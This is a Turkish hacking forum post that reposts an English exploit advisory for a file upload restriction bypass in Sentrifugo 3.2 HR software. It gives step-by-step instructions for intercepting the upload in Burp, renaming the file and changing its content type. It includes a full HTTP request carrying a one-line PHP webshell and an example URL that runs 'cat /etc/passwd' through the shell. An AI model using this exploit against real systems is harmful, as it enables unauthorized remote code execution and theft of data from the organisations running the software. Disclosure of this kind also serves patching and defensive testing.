• Hack kategorilerindeki birçok içerik Gizli içeriktir yani sadece cevap yazarakı erişebileceğiniz türden içeriklerdir, ancak yeni üyelerin hack kategorilerine cevap yazması engellenmiştir ! spam ve sömürüye karşı bir tedbirdir, forumumuza katkı sunarsanız rütbeniz kısa sürede yükselir ve tüm forumu engelsiz kullanabilirsiniz.

Sentrifugo 3.2 - File Upload Restriction Bypass

Multiple File Upload Restriction Bypass vulnerabilities were found in Sentrifugo 3.2. This allows for an authenticated user to potentially obtain RCE via webshell.
File upload bypass locations:

Kod:
/sentrifugo/index.php/mydetails/documents -- Self Service >> My Details >> Documents (any permissions needed)
sentrifugo/index.php/policydocuments/add -- Organization >> Policy Documents (higher permissions needed)
1. Self Service >> My Details >> Documents >> add New Document (/sentrifugo/index.php/mydetails/documents)
2. Turn Burp Intercept On
3. Select webshell with valid extension - ex: shell.php.doc
4. Alter request in the upload...
Update 'filename' to desired extension. ex: shell.php Change content type to 'application/x-httpd-php'

Example exploitation request:

POST /sentrifugo/index.php/employeedocs/uploadsave
HTTP/1.1 Host: 10.42.1.42
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0 Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate Referer: http://10.42.1.42/sentrifugo/index.php/mydetails/documents X-Requested-With: XML
HttpRequest Content-Length: 494

Kod:
-----------------------------205946976257369239535727507

Content-Disposition: form-data; name="myfile"; filename="shell.php"

Content-Type: application/x-httpd-php[

<?php $cmd=$_GET['cmd']; system($cmd);?>

-----------------------------205946976257369239535727507
Content-Disposition: form-data; name=""

undefined
-----------------------------205946976257369239535727507
Content-Disposition: form-data; name=""

undefined
-----------------------------205946976257369239535727507--
5. With intercept still on, Save the document and copy the 'file_new_names' parmeter from the new POST request.
6. Append above saved parameter and visit your new webshell
Kod:
Ex: http://10.42.1.42/sentrifugo/public/uploads/employeedocs/1565996140_5_shell.php?cmd=cat /etc/passwd
Kaynak: https://cxsecurity.com/issue/WLB-2019090015
 
Üst